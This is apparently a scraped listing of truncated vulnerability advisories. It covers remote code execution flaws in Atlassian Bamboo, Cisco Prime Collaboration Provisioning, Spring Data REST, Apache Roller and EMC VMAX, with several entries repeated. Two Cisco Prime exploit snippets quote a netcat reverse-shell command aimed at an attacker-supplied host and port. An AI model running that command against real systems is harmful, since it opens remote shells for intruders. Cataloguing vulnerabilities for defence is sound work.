Design/Logic Flaw

It was possible for double OGNL evaluation in FreeMarker templates through Struts FreeMarker tags to occur. An attacker who has restricted administration rights to Bamboo or who hosts a website that a Bamboo administrator visits, is able to exploit this vulnerability to execute Java code of their...

CVE-2017-14589

CVE-2017-14589: Atlassian Bamboo is affected by a remote code execution issue caused by double OGNL evaluation in FreeMarker templates via Struts FreeMarker tags. Affected versions are Bamboo < 6.1.6 and 6.2.0 ≤ Bamboo

CVE-2017-14589

It was possible for double OGNL evaluation in FreeMarker templates through Struts FreeMarker tags to occur. An attacker who has restricted administration rights to Bamboo or who hosts a website that a Bamboo administrator visits, is able to exploit this vulnerability to execute Java code of their...

Bamboo 6.x Remote Code Execution Vulnerability

Bamboo versions prior to 6.0.5, 6.1.4, and 6.2.1 suffer from a code execution vulnerability. Bamboo 6.x Remote Code Execution CVE ID: CVE-2017-9514. Product: Bamboo. Affected Bamboo product versions: 6.0.0 = 6.0.0 but less than 6.0.5 the fixed version for 6.0.x or who have downloaded and installe...

Cisco Prime Collaboration Provisioning ScriptMgr HEAD request vulnerability

Added: 10/25/2017 CVE: CVE-2017-6622 BID: 98520 Background The Cisco Prime Collaboration product family facilitates installation and maintenance of Cisco Unified Communications and Cisco TelePresence components, as well as the provisioning of users and services. Problem Missing security constrain...

Cisco Prime Collaboration Provisioning ScriptMgr HEAD request vulnerability

Added: 10/25/2017 CVE: CVE-2017-6622 BID: 98520 Background The Cisco Prime Collaboration product family facilitates installation and maintenance of Cisco Unified Communications and Cisco TelePresence components, as well as the provisioning of users and services. Problem Missing security constrain...

Cisco Prime Collaboration Provisioning ScriptMgr HEAD request vulnerability

Added: 10/25/2017 CVE: CVE-2017-6622 BID: 98520 Background The Cisco Prime Collaboration product family facilitates installation and maintenance of Cisco Unified Communications and Cisco TelePresence components, as well as the provisioning of users and services. Problem Missing security constrain...

Atlassian Bamboo REST Endpoint Remote Code Execution Vulnerability

Atlassian Bamboo is a suite of continuous integration build tools from Atlassian Australia. The tool helps development teams build, test, release and deploy projects using continuous delivery capabilities.REST endpoint is one of the REST endpoints. A security vulnerability exists in the REST...

Code injection

Bamboo before 6.0.5, 6.1.x before 6.1.4, and 6.2.x before 6.2.1 had a REST endpoint that parsed a YAML file and did not sufficiently restrict which classes could be loaded. An attacker who can log in to Bamboo as a user is able to exploit this vulnerability to execute Java code of their choice on...

CVE-2017-9514

CVE-2017-9514 affects Atlassian Bamboo. A REST endpoint could parse YAML and did not adequately restrict loaded classes, enabling an authenticated user to execute Java code on vulnerable Bamboo versions. Affected ranges: 6.0.x before 6.0.5, 6.1.x before 6.1.4, and 6.2.x before 6.2.1. Remediation ...

CVE-2017-9514

Bamboo before 6.0.5, 6.1.x before 6.1.4, and 6.2.x before 6.2.1 had a REST endpoint that parsed a YAML file and did not sufficiently restrict which classes could be loaded. An attacker who can log in to Bamboo as a user is able to exploit this vulnerability to execute Java code of their choice on...

Atlassian Bamboo Remote Code Execution

Bamboo 2.2 before 5.8.5 and 5.9.x before 5.9.7 allows remote attackers with access to the Bamboo web interface to execute arbitrary Java code via an unspecified resource. SPDX-FileCopyrightText: 2017 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyrig...

CVE-2015-6576

Bamboo 2.2 before 5.8.5 and 5.9.x before 5.9.7 allows remote attackers with access to the Bamboo web interface to execute arbitrary Java code via an unspecified resource...

Code injection

Bamboo 2.2 before 5.8.5 and 5.9.x before 5.9.7 allows remote attackers with access to the Bamboo web interface to execute arbitrary Java code via an unspecified resource...

CVE-2015-6576

Bamboo 2.2 before 5.8.5 and 5.9.x before 5.9.7 allows remote attackers with access to the Bamboo web interface to execute arbitrary Java code via an unspecified resource...

Cisco Prime Collaboration Provisioning 12.1 - Authentication Bypass Remote Code Execution

Cisco Prime Collaboration Provisioning 12.1 - Authentication Bypass Remote Code Execution Exploit Title: Cisco Prime Collaboration Provisioning function encode echo "$1" | perl -MURI::Escape -ne 'chomp;print uriescape$,"\n"' TARGET=$1 ATTACKER=$2 PORT=$3 BASH=$encode "/bin/bash" COMMAND=$encode "...

Cisco Prime Collaboration Provisioning < 12.1 - Authentication Bypass / Remote Code Execution

Exploit Title: Cisco Prime Collaboration Provisioning function encode echo "$1" | perl -MURI::Escape -ne 'chomp;print uriescape$,"\n"' TARGET=$1 ATTACKER=$2 PORT=$3 BASH=$encode "/bin/bash" COMMAND=$encode "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&1|nc $ATTACKER $PORT /tmp/f"...

Pivotal Spring Data REST Remote Code Execution Vulnerability

Spring Data REST is part of the Spring Data project and enables building hypermedia-driven REST web services on top of the Spring Data repository. A remote code execution vulnerability exists in Pivotal Spring Data REST, which allows an attacker to perform a remote code execution attack by...

Apache Roller Execute Arbitrary java Code Vulnerability

Apache Roller is the United States Apache Apache Software Foundation's set of feature-rich multi-user blogging platform. A security vulnerability exists in the weblog page template in Apache Roller versions 5.1 through 5.1.1. The vulnerability can be exploited by a remote attacker to execute...

EMC VMAX VASA Provider Virtual Appliance File Upload RCE

The EMC VMAX VASA Provider Virtual Appliance running on the remote host is affected by a remote code execution vulnerability in the UploadConfigurator servlet due to a failure to restrict file uploads to arbitrary directories. An unauthenticated, remote attacker can exploit this issue to upload...